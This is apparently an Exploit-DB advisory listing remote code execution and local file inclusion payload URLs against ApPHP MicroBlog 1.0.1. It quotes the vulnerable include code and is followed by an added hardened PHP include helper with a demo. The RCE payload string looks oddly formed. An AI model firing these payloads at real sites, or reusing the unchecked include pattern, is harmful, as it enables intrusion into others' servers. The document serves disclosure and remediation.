ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities

Author: JIKO
type: webapps
platform: php
port: 
date_added: 2014-04-26  
date_updated: 2014-04-26  
verified: 1  
codes: OSVDB-106352;OSVDB-106351  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt33500/screen-shot-2014-04-26-at-112922.png  
application_url: http://www.exploit-db.comphp_microblog_101.zip  

raw file: 33030.txt  
----------[exploit Start]
[Multiple Vulnerabilities]
----------[Script Info]

Me : JIKO
Site    : No-exploit.Com


----------[Script Info]

Site        : http://www.apphp.com
Download    : http://www.apphp.com/downloads_free/php_microblog_101.zip

----------[exploit Info]

~[RCE]
http://path/index.php?jiko);system((dir)=/
~[LFI]
http://path/index.php?index.php?page=FILE%00 (you need to bypass the filter)
http://path/index.php?index.php?admin=FILE%00 (you need to bypass the filter)

if (($page != "") && file_exists("page/" . $page . ".php")) {
    include_once("page/" . $page . ".php");
} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
    include_once("admin/" . $admin . ".php");
}
----------[exploit End]
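
Added example, not part of the original advisory or of ApPHP MicroBlog: a hardened form of the include logic above, in PHP. The resolve_include() helper is hypothetical; it allowlists page names against the files actually present and checks the canonical path before anything is included. The temporary directory and the input strings are constructed for the demonstration.

```php
<?php
// Added example, not ApPHP MicroBlog code. resolve_include() is a
// hypothetical helper; the page/ directory layout follows the advisory.

function resolve_include(string $baseDir, string $name): ?string
{
    // Accept plain identifiers only: no dots, slashes or NUL bytes, so
    // "FILE%00"-style truncation and "../" traversal never reach include.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Allowlist built from the files actually shipped in the directory.
    $allowed = [];
    foreach (glob($base . DIRECTORY_SEPARATOR . '*.php') ?: [] as $file) {
        $allowed[basename($file, '.php')] = $file;
    }
    if (!isset($allowed[$name])) {
        return null;
    }
    // Defence in depth: the canonical path must stay under $base even if
    // a symlink was planted inside the directory.
    $real = realpath($allowed[$name]);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo data: a throwaway page/ directory with one real page.
$dir = sys_get_temp_dir() . '/microblog_demo_' . bin2hex(random_bytes(4)) . '/page';
mkdir($dir, 0700, true);
file_put_contents($dir . '/home.php', "<?php echo 'home';\n");

// Constructed inputs: one valid name, then NUL, traversal and unknown names.
foreach (["home", "home\0", "../admin/login", "....//home", "missing"] as $input) {
    $path = resolve_include($dir, $input);
    printf("%-20s => %s\n",
        json_encode($input, JSON_UNESCAPED_SLASHES),
        $path === null ? 'rejected' : 'include ' . basename($path));
}
```

In the application, the page and admin branches would each call the helper with their own directory and include the returned path only when it is not null.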